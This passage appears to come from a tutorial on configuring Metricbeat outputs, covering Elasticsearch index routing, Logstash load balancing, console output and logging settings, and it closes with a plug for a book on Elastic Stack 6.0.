If the message contains neither of these texts, then those events will be pushed to the logs-%{+yyyy.MM.dd} index as specified in the index parameter: output.elasticsearch: hosts: ["http://localhost:9200"] index: "logs-%{+yyyy.MM.dd}" indices: - index: "debug-%{+yyyy.MM.dd}" when.contains: message: "DEBUG" - index: "error-%{+yyyy.MM.dd}" when.contains: message: "ERR" When the index parameter is overridden, disable templates and dashboards by adding the following setting in: setup.dashboards.enabled: false setup.template.enabled: false Alternatively, provide the value for setup.template.name and setup.template.pattern in the metricbeat.yml configuration file, or else Metricbeat will fail to run. logstash: It is used to send the events to Logstash. To use Logstash as the output, Logstash needs to be configured with the Beats input plugin to receive incoming Beats events. A sample Logstash output configuration is as follows: output.logstash: enabled: true hosts: ["localhost:5044"] Using the enabled setting, one can enable or disable the output. hosts accepts one or more Logstash servers. Multiple hosts can be defined for failover purposes. If the configured host is unresponsive, then the event will be sent to one of the other configured hosts. When multiple hosts are configured, the events are distributed in random order. To enable load balancing of events across the Logstash hosts, use the loadbalance flag, set to true: output.logstash: hosts: ["localhost:5045", "localhost:5046"] loadbalance: true console: It is used to send the events to stdout. The events are written in JSON format. It is useful during debugging or testing. A sample console configuration is as follows: output.console: enabled: true pretty: true Logging This section contains the options for configuring the Filebeat logging output. The logging system can write logs to syslog or rotate log files. If logging is not explicitly configured, file output is used on Windows systems, and syslog output is used on Linux and OS X. A sample configuration is as follows: logging.level: debug logging.to_files: true logging.files: path: C:logsmetricbeat name: metricbeat.log keepfiles: 10 Some of the configuration options are: level: To specify the logging level. to_files: To write all logging output to files. The files are subject to file rotation. This is the default value. to_syslog: To write the logging output to syslogs if this setting is set to true. files.path, files.name, and files.keepfiles: These are used to specify the location of the file, the name We successfully configured Beat Library, MetricBeat and developed good transmission of operational metrics to Elasticsearch, making it easy to monitor systems and services on servers with much ease. If you found this tutorial useful, do check out the book Learning Elastic Stack 6.0 to examine the fundamentals of Elastic Stack in detail and start developing solutions for problems like logging, site search, app search, metrics and more.      